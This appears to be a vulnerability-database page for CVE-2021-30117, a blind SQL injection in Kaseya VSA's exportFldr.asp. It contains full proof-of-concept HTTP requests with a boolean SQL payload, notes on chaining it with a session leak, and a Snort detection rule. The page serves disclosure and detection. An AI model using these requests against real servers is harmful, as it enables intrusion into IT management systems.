cbcvebase.
CVE-2021-30117
published 2021-07-09

CVE-2021-30117: The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description…

PriorityP271high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EPSS
72.05%
99.4th percentile
The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1’ HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 Whoops. ----SNIP---- ``` However when fldrId is set to ‘(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))’ the request is allowed. Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transp

Affected

1 ranges
VendorProductVersion rangeFixed in
kaseyavsa< 9.5.69.5.6

Detection & IOCsextracted from sources · hover to see the quote

url/InstallTab/exportFldr.asp
path/dl.asp
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Kaseya VSA Authenticated SQL Injection in exportFldr (CVE-2021-30117)"; flow:established,to_server; http.uri; content:"/InstallTab/exportFldr.asp?"; fast_pattern; content:"fldrId|3d|"; pcre:"/^[^&]*?(?:(?:S(?:HOW\x20(?:C(?:UR(?:DAT|TIM)E|HARACTER\x20SET)|(?:VARI|T)ABLES)|ELECT\x20(?:FROM|USER|SLEEP))|U(?:NION\x20SELEC|PDATE\x20SE)T|DELETE\x20FROM|INSERT\x20INTO)|S(?:HOW.+(?:C(?:HARACTER.+SET|UR(DATE|TIME))|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER))|U(?:NION.+SELEC|PDATE.+SE)T|DELETE.+FROM|INSERT.+INTO|\x2f\*.+\*\x2f)/Ri"; reference:url,csirt.divd.nl/cves/CVE-2021-30117/; reference:cve,2021-30117; classtype:web-application-attack; sid:2065485; rev:1; metadata:affected_product Kaseya_VSA, attack_target Server, tls_state TLSDecrypt, created_at 2025_10_27, cve CVE_2021_30117, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_10_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Exploitation is semi-authenticated: a valid sessionId cookie (obtainable via CVE-2021-30116 credential leak) is required. Correlate detections for CVE-2021-30116 sessionId harvesting with subsequent requests to /InstallTab/exportFldr.asp.
  • Monitor for SQL keywords (SELECT, UNION, CASE, WHEN, FROM, SLEEP, INSERT, DELETE, UPDATE) URL-encoded or plaintext in the fldrId query parameter of requests to /InstallTab/exportFldr.asp.
  • Agent GUIDs can be retrieved from the local registry of a compromised host running a VSA agent and used for authentication bypass via /dl.asp. Hunt for registry reads of the VSA agent GUID key on endpoints.
  • The Snort/ET rule (sid:2065485) should be deployed at both perimeter and internal sensors with TLS inspection enabled (tls_state TLSDecrypt) to catch encrypted exploitation attempts.
  • ·Exploitation requires a valid sessionId cookie, which must first be obtained via CVE-2021-30116 (credentials leak / business logic flaw). This CVE alone is not exploitable without that prerequisite session token.
  • ·Kaseya's SaaS VSA platform was stated to not be vulnerable to the exploited vulnerabilities; only on-premises VSA servers are affected.
  • ·The ET Snort rule requires TLS decryption to be effective against HTTPS-protected VSA deployments.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.